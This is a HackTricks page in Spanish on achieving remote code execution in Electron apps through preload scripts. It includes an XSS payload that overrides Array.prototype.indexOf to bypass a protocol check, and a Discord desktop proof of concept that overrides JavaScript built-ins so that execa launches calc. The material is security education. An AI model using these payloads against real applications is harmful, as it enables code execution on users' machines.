6 KiB
RCE en Electron con aislamiento de contexto a través de código de precarga
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de Telegram o sigue a Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub de HackTricks y HackTricks Cloud.
Ejemplo 1
Este código abre enlaces http(s) con el navegador predeterminado:
Algo como file:///C:/Windows/systemd32/calc.exe podría usarse para ejecutar una calculadora, el SAFE_PROTOCOLS.indexOf lo está previniendo.
Por lo tanto, un atacante podría inyectar este código JS a través de XSS o navegación arbitraria de páginas:
<script>
Array.prototype.indexOf = function(){
return 1337;
}
</script>
Como la llamada a SAFE_PROTOCOLS.indexOf siempre devolverá 1337, el atacante puede eludir la protección y ejecutar el calc. Exploit final:
<script>
Array.prototype.indexOf = function(){
return 1337;
}
</script>
<a href="file:///C:/Windows/systemd32/calc.exe">CLICK</a>
Consulte las diapositivas originales para otras formas de ejecutar programas sin que se solicite permiso.
Aparentemente, otra forma de cargar y ejecutar código es acceder a algo como file://127.0.0.1/electron/rce.jar
Ejemplo 2: Discord App RCE
Ejemplo de https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1
Al revisar los scripts de precarga, descubrí que Discord expone la función, que permite que algunos módulos permitidos sean llamados a través de DiscordNative.nativeModules.requireModule('MODULE-NAME'), en la página web.
Aquí, no pude usar módulos que se pueden utilizar para RCE directamente, como el módulo child_process, pero encontré un código donde se puede lograr RCE sobrescribiendo los métodos integrados de JavaScript e interfiriendo con la ejecución del módulo expuesto.
A continuación se muestra el PoC. Pude confirmar que la aplicación calc se abre cuando llamo a la función getGPUDriverVersions que está definida en el módulo llamado "discord_utils" desde devTools, mientras sobrescribo RegExp.prototype.test y Array.prototype.join.
RegExp.prototype.test=function(){
return false;
}
Array.prototype.join=function(){
return "calc";
}
DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();
La función getGPUDriverVersions intenta ejecutar el programa utilizando la biblioteca "execa", de la siguiente manera:
module.exports.getGPUDriverVersions = async () => {
if (process.platform !== 'win32') {
return {};
}
const result = {};
const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;
try {
result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
} catch (e) {
result.nvidia = {error: e.toString()};
}
return result;
};
Normalmente, execa intenta ejecutar "nvidia-smi.exe", que se especifica en la variable nvidiaSmiPath, sin embargo, debido a la sobreescritura de RegExp.prototype.test y Array.prototype.join, el argumento se reemplaza por "calc" en el procesamiento interno de _execa_**.
Específicamente, el argumento se reemplaza cambiando las siguientes dos partes.
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub HackTricks y HackTricks Cloud.